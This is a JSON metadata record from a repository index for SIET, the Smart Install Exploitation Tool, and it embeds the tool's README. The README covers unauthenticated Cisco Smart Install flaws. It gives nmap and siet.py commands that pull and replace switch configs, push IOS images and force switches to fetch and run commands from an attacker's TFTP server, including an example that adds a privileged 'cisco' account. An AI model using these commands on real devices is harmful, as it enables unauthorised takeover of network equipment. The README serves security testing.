{"id":13539067,"url":"https://github.com/frostbits-security/SIET","last_synced_at":"2025-04-02T05:33:15.786Z","repository":{"id":45365999,"uuid":"73805759","full_name":"frostbits-security/SIET","owner":"frostbits-security","description":"Smart Install Exploitation Tool","archived":false,"fork":false,"pushed_at":"2021-12-21T15:05:52.000Z","size":55,"stargazers_count":566,"open_issues_count":1,"forks_count":145,"subscribers_count":29,"default_branch":"master","last_synced_at":"2024-08-11T17:10:13.843Z","etag":null,"topics":["cisco","exploit","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/frostbits-security.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-11-15T11:08:18.000Z","updated_at":"2024-08-02T13:50:54.000Z","dependencies_parsed_at":"2022-09-02T01:20:18.165Z","dependency_job_id":null,"html_url":"https://github.com/frostbits-security/SIET","commit_stats":null,"previous_names":["sab0tag3d/siet"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frostbits-security%2FSIET","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frostbits-security%2FSIET/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frostbits-security%2FSIET/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frostbits-security%2FSIET/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/frostbits-security","download_url":"https://codeload.github.com/frostbits-security/SIET/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222805560,"owners_count":17040423,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cisco","exploit","vulnerability"],"created_at":"2024-08-01T09:01:19.799Z","updated_at":"2024-11-03T04:30:15.007Z","avatar_url":"https://github.com/frostbits-security.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing"],"sub_categories":["\u003ca id=\"41ae40ed61ab2b61f2971fea3ec26e7c\"\u003e\u003c/a\u003e漏洞利用"],"readme":"## This is python2 version. Please use python3 version of tool from here: https://github.com/frostbits-security/SIETpy3\n\n# SIET - Smart Install Exploitation Tool\n\nCisco Smart Install is a plug-and-play configuration and image-management feature that provides zero-touch deployment for new switches. You can ship a switch to a location, place it in the network and power it on with no configuration required on the device.\n\nYou can easy identify it using nmap cisco-siet.nse script. Just download it and run it: \n```\t\nnmap -p 4786 -v 192.168.0.1\t# By default, it will just test whether host is vulnerable or not\n$ nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse\n# You can pass argument to get config\n# Note: you need to run it as root\n# If you are attacking public ip, make sure to provide your public ip to the script (cisco-siet.addr=\u003cPUBLIC_IP\u003e)\n$ sudo nmap -p 4786 -v 192.168.0.1 --script ./cisco-siet.nse \\\n\u003e --script-args \"cisco-siet.get\"\n```\n\nThis protocol has a few security issues and this simple tool helps you to use all of them.:\n\n1. Change tftp-server address on client device by sending one malformed TCP packet.\n2. Copy client's `startup-config` on tftp-server exchanged previously.\n3. Substitute client's `startup-config` for the file which has been copied and edited. Device will reboot in defined time.\n4. Upgrade ios image on the \"client\" device.\n5. Execute random set of commands on the \"client\" device. IS a new feature working only at `3.6.0E` and `15.2(2)E` ios versions. \n\n\nAll of them are caused by the lack of any authentication in smart install protocol. Any device can act as a director and send malformed tcp packet. It works on any \"client\" device where smart install is enabled. It does not matter if it used smart install in the network or not.\n\n**Confim** from vendor: \n\n- https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi\n- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160323-smi\n\n**Slides**: https://2016.zeronights.ru/wp-content/uploads/2016/12/CiscoSmartInstall.v3.pdf\n\n# USAGE\n\nYou can use it for password recovery of for unlock cisco switch when no password provided.\n\nExample to get config:\n\n```\nsudo python siet.py -g -i 192.168.0.1\n```\n\nOptions:\n\n- `-t`  test device for smart install\n- `-g`  get device config\n- `-c`  change device config\n- `-C`  change multiple device configs\n- `-u`  update device IOS\n- `-e`  execute commands in device's console\n- `-i` ip address of target device\n- `-l` ip list of targets (file path)\n- `--thread-count` number of threads to be spawned\n\n## How to use `-e` option\n1. You have to create directory `tftp` (near siet.py) and file inside it `tftp/execute.txt`\n2. File should contains commands for cisco switch, each command in quotes, separate by space. Example: `\"username cisco privilege 15 secret 0 cisco\" \"exit\"`\n3. Then you run `siet.py` with IP address of device.\n4. `siet.py` starts tftp server (69 port UDP) on your IP.\n5. `siet.py` send command to switch to force download that file and execute it.  \n    **Note: device need to have route to your IP. If you run it again device in Internet, you must run it from external IP**\n6. Device go to you TFTP server, download and execute commands from file (no reboot is necessary)\n\n# UPDATES\n\nNew option `-C`. You can place configs into the `tftp/conf` directory following the \nnaming convention of `ip.conf`, ie: `192.168.10.1.conf`. A target ip list `-l` must be used\nin conjunction with this option, the name of the conf corresponds to it's target destination.\n\nNew option `-l`. You can use list of ip addresses for getting configuration file.\n\nFix bug with incorrect test of device.\n\nIf you are thinking about what to do with the copied configuration files, you can try our new tool: [Cisco Config Analysis Tool](https://github.com/cisco-config-analysis-tool/ccat)\n\nIf you have any questions, please write me at telegram: @sab0tag3d\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrostbits-security%2FSIET","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffrostbits-security%2FSIET","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrostbits-security%2FSIET/lists"}